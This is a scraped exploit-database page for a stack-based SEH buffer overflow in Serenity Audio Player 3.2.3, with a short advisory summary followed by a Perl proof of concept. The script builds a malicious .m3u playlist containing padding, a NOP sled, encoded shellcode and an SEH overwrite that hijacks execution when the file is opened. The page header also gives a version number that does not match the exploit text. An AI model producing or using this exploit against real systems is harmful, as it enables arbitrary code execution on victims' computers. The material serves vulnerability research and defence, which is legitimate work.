Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Serenity Audio Player Buffer Overflow - exploit.company
header-logo
Suggest Exploit
vendor:
Serenity Audio Player
by:
Madjix Dz8[at]hotmail[dot]com
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Serenity Audio Player
Affected Version From: 3.2.2003
Affected Version To: 3.2.2003
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows

Serenity Audio Player Buffer Overflow

Serenity Audio Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Mitigation:

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/39768/info

Serenity Audio Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Serenity Audio Player 3.2.3 is vulnerable; other versions may also be affected. 

#Serenity Audio Player 3.2.3 (SEH) Buffer Overflow
#Download :
http://malsmith.kyabram.biz/serenity/serenity-3.2.3-win32-installer.exe
#By Madjix Dz8[at]hotmail[dot]com
my $hd= "http://" ;
my $jnk="\x41" x 838 ;
my $nops = "\x90" x 10 ;
my $shellcode= "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
my $mad="\xe9\xd4\xfe\xff\xff";
my $nseh="\xeb\xf9\x90\x90";
my $seh="\xe8\x47\x40";

open(MYFILE,'>>MadjiX.m3u');
print MYFILE $hd.$jnk.$nops.$shellcode.$mad.$nseh.$seh;
close(MYFILE);